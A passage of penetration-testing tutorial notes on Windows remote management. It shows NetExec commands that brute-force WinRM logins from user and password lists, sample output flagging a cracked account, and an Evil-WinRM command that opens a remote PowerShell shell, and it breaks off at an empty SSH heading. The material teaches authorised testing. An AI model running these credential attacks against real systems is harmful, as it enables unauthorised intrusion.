
# Network Services

During penetration tests, computer networks have services for managing, editing, or creating content. These services run with specific permissions assigned to particular users. Beyond web applications, common services include `FTP`, `SMB`, `NFS`, `IMAP/POP3`, `SSH`, `MySQL/MSSQL`, `RDP`, `WinRM`, `VNC`, `Telnet`, `SMTP`, and `LDAP`.

To manage a Windows server remotely, you need services for system access, command execution, or GUI/terminal access. The most common options are `RDP`, `WinRM`, and `SSH`. SSH is rare on Windows but standard for Linux systems.

These services typically use username/password authentication. While they can be configured for key-based authentication, many retain default settings.

## 1. WinRM

**WinRM**

Windows Remote Management (`WinRM`) is Microsoft's implementation of the Web Services Management Protocol (`WS-Management`). It's an XML web services network protocol using Simple Object Access Protocol (`SOAP`) for remote Windows system management. WinRM handles communication between Web-Based Enterprise Management (`WBEM`) and Windows Management Instrumentation (`WMI`), which can invoke the Distributed Component Object Model (`DCOM`).

For security, WinRM requires manual activation and configuration in Windows 10/11. Its security depends heavily on the domain or local network environment. Most implementations use certificates or specific authentication mechanisms for enhanced security. WinRM uses TCP ports `5985` (HTTP) and `5986` (HTTPS) by default.

`NetExec` is a useful tool for password attacks on WinRM and other protocols like SMB, LDAP, and MSSQL. Review the official documentation to familiarize yourself with this tool.

### NetExec

**Installing NetExec**: `$ sudo apt-get -y install netexec`

**NetExec Menu Options**: `$ netexec -h`

**NetExec Protocol-Specific Help**: `$ netexec smb -h` (Note that we can specify a specific protocol and receive a more detailed help menu of all of the options available to us. NetExec currently supports remote authentication using NFS, FTP, SSH, WinRM, SMB, WMI, RDP, MSSQL, LDAP, and VNC.)

**NetExec Usage**: 
- The general format for using NetExec is as follows: `$ netexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>`
- As an example, this is what attacking a WinRM endpoint might look like:

```
$ netexec winrm 10.129.42.197 -u user.list -p password.list

WINRM       10.129.42.197   5985   NONE             [*] None (name:10.129.42.197) (domain:None)
WINRM       10.129.42.197   5985   NONE             [*] http://10.129.42.197:5985/wsman
WINRM       10.129.42.197   5985   NONE             [+] None\user:password (Pwn3d!)
```

The appearance of (`Pwn3d!`) is the sign that we can most likely execute system commands if we log in with the brute-forced user. Another handy tool that we can use to communicate with the WinRM service is `Evil-WinRM`, which allows us to communicate with the WinRM service efficiently.

### Evil-WinRM

- Installing Evil-WinRM: `$ sudo gem install evil-winrm`
- Evil-WinRM Usage: `$ evil-winrm -i <target-IP> -u <username> -p <password>`

```
$ evil-winrm -i 10.129.42.197 -u user -p password

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\user\Documents>
```

If the login was successful, a terminal session is initialized using the Powershell Remoting Protocol (`MS-PSRP`), which simplifies the operation and execution of commands.

## 2. SSH































